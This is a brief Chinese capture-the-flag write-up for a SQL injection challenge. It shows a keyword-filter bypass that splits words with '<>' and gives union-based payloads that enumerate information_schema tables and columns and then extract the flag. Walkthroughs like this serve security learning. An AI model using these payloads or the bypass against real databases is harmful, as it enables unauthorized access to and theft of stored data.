百度杯_sql

SQL

这题很明确就是个sql注入，直接测试看下是啥注入。

可以得知是一个数值型的注入。

把关键字都放上去测试发现过滤了select , and , or，可以使用<>绕过

使用o<>rder by测试只有三列

直接构造payload：爆表
0 union se<>lect 1,group_concat(table_name) ,3 from information_schema.tables where table_schema = database()

0 union se<>lect 1,group_concat(column_name) ,3 from information_schema.columns where table_schema = database() a<>nd table_name='info'

0 union se<>lect 1,group_concat(flAg_T5ZNdrm) ,3 from info